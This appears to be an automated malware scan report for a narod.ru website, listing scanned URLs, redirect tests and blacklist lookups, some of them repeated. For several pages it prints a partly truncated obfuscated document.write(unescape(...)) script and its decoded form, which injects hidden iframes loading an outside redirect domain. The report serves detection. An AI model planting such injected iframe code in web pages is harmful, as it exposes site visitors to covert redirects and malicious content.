Scanned pages/files
| Request | Server response | Status |
http://vasyakinryoige.narod.ru/736_url.html | 200 OK Content-Length: 25456 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.396944625904972 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/abnl/?adsdata=pCElPJuhYX7b^OyjjCDjCNiSV8jNCuGkNh2ic6tP^S9LhAcABRnhUNheUYblVRpxhgSqy4pkpYa1iU0gwKLqXWgN360D!gcy!h4q9sJcStOZfGmxM!HbTBi45tiqPq!W4zr7iqLqdnG6NxyEepsFPKK80DFf30NVMddFO7!mXhNFRKR^vVxQO;Bx0ykf5n6n4eN0jVbgxQ;o | 200 OK Content-Length: 2509 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/507_url.html | 200 OK Content-Length: 27340 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.660037986221376 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/abnl/?adsdata=K8^GTV9e;KTS7PtTu!bksELguw9HDEMDHUIUMkf9KLpyV;6dC6VDHmem8PSEV1b4au1yRKFF0l8GsOnaR!sr97KANVMBhghPjFtjkQpZeGM6k^bfy66BQL^Ks6T8^DeMDlvFD7SLsl!!cR7QuY7yALbm2RLrbtnkMdEur9yeG8nSzsJuzb^!i4GMlaUy4C94!bs7ydhXYy!g | 200 OK Content-Length: 2517 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/255_url.html | 200 OK Content-Length: 28091 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.211309952641379 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/abnl/?adsdata=HMdA9!SDNbaba9ZUxORa6XhY1fqKn1CSVWH46!Sym7REIXacOaepm2HfsgNvf2k4KGwcmjrurcYsupVvTJnjTDCGLl!714IJ5ly5XhxA0R6q^P^^^IM2niuwtf9GtFbOH;Nb9caCafgDAOEWClcj6Q4TsLj!gmJGTQCsSIiNfYhCLX3W4dFEGM9zmJZi^dVUtWrH8Vz3wI9K | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/589_url.html | 200 OK Content-Length: 23469 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.521425524892724 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/abnl/?adsdata=^xNZ7rxN!E24llJpH1vl3^U1UGp^zinzlrPAiR9febXH54J6NC2gqN6RjAyh5yaZBV6S6Wjr;fMOzS8x8VyLai4Mi2iQNEVSA6lOIFvrssAW8SJCOHDSVJ1t!U3erS7ywPFNbYyD8ELL1wj3bI02CBi20dNR1fATsvNUV2a63D8HxCiMKZGzQLs4Qkg93E2X0nhq^gkXjgoo | 200 OK Content-Length: 2541 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/509_url.html | 200 OK Content-Length: 24744 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.917421227432929 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://vasyakinryoige.narod.ru/abnl/?adsdata=wr!LtYb;maj1251qqZ7zrIu^2X9HBCajNPA9kNV6jvAQQ2b^76QxxPhH;s52BBpHUSJtpPQSS5KbWJ8cvw8zzFcQKWizGdWmiRH6DDpLHSePnOskbL;U8Iy;CG5inxARE9R2npQuHtJtk!X2Gy3AGRb;Eea5e4rskiUpgd2T7bJpvDyrbx7XUtQvvLlPK65ax0wtjwphPBpn | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vasyakinryoige.narod.ru
Result:
GET / HTTP/1.1
Host: vasyakinryoige.narod.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vasyakinryoige.narod.ru
Referer: http://www.google.com/search?q=vasyakinryoige.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vasyakinryoige.narod.ru
Referer: http://www.google.com/search?q=vasyakinryoige.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vasyakinryoige.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vasyakinryoige.narod.ru/
Result: vasyakinryoige.narod.ru is not infected or malware details are not published yet.
Result: vasyakinryoige.narod.ru is not infected or malware details are not published yet.